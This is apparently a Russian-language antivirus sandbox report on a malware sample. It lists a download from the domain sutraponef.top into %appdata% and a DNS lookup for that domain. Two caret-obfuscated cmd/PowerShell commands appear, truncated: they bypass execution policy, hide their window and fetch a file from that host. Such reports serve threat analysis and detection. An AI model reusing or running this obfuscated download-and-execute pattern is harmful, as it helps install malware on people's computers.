Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^o^WeRsH^Ell.E^xe -^ExEc^ut^iO^n^po^LIc^Y^ Byp^a^sS^ ^-nOprO^FilE^ -wIN^d^Ow^s^t^YL^E HiDDen ^(^NeW^-^O^Bject^ systEM.nET^.w^Eb^CLIEnt)^.DowNlo^a^DFilE('http://sutraponef.top...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /C "p^o^WeRsH^Ell.E^xe -^ExEc^ut^iO^n^po^LIc^Y^ Byp^a^sS^ ^-nOprO^FilE^ -wIN^d^Ow^s^t^YL^E HiDDen ^(^NeW^-^O^Bject^ systEM.nET^.w^Eb^CLIEnt)^.DowNlo^a^DFilE('http://sutraponef.top...' (со скрытым окном)